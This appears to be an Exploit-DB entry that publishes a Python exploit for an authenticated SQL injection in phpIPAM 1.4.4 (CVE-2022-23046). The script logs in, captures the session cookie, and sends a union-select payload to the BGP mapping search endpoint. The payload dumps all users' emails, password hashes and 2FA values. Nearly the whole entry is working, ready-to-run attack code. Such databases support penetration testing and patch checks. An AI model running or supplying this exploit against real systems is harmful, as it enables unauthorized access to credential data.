PHPIPAM 1.4.4 - SQLi (Authenticated)

EDB-ID:

50684

CVE:

2022-23046

EDB Verified:

Author:

Rodolfo Tavares

Type:

webapps

Exploit:   /  

Platform:

PHP

Date:

2022-01-25

Vulnerable App: 
# Exploit Title: PHPIPAM 1.4.4 - SQLi (Authenticated)
# Google Dork: [if applicable]
# Date: 20/01/2022
# Exploit Author: Rodolfo "Inc0gbyt3" Tavares
# Vendor Homepage: https://github.com/phpipam/phpipam
# Software Link: https://github.com/phpipam/phpipam
# Version: 1.4.4
# Tested on: Linux/Windows
# CVE : CVE-2022-23046

import requests
import sys
import argparse

################
"""
Author of exploit: Rodolfo 'Inc0gbyt3' Tavares
CVE: CVE-2022-23046
Type: SQL Injection

Usage:

$ python3 -m pip install requests
$ python3 exploit.py -u http://localhost:8082 -U <admin> -P <password>
"""
###############

__author__ = "Inc0gbyt3"

menu = argparse.ArgumentParser(description="[+] Exploit for PHPIPAM Version: 1.4.4 Authenticated SQL Injection\n CVE-2022-23046")
menu.add_argument("-u", "--url", help="[+] URL of target, example: https://phpipam.target.com", type=str)
menu.add_argument("-U", "--user", help="[+] Username", type=str)
menu.add_argument("-P", "--password", help="[+] Password", type=str)
args = menu.parse_args()

if len(sys.argv) < 3:
    menu.print_help()

target = args.url
user = args.user
password = args.password


def get_token():
    u = f"{target}/app/login/login_check.php"

    try:
        r = requests.post(u, verify=False, timeout=10, headers={"User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36", "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8"}, data={"ipamusername":user, "ipampassword":password})
        headers = r.headers['Set-Cookie']
        headers_string = headers.split(';')
        for s in headers_string:
            if "phpipam" in s and "," in s: # double same cookie Check LoL
                cookie = s.strip(',').lstrip()
                return cookie
    except Exception as e:
        print(f"[+] {e}")


def exploit_sqli():
    cookie = get_token()
    xpl = f"{target}/app/admin/routing/edit-bgp-mapping-search.php"
    data = {
        "subnet":'pwn"union select(select concat(@:=0x3a,(select+count(*) from(users)where(@:=concat(@,email,0x3a,password,"0x3a",2fa))),@)),2,3,user() -- -', # dios query dump all :)
        "bgp_id":1
    }

    headers = {
        "User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36", "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
        "Cookie": cookie
    }

    try:
        r = requests.post(xpl, verify=False, timeout=10, headers=headers, data=data)
        if "admin" in r.text or "rounds" in r.text:
            print("[+] Vulnerable..\n\n")
            print(f"> Users and hash passwords: \n\n{r.text}")
            print("\n\n> DONE <")
    except Exception as e:
        print(f"[-] {e}")



if __name__ == '__main__':
    exploit_sqli()
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services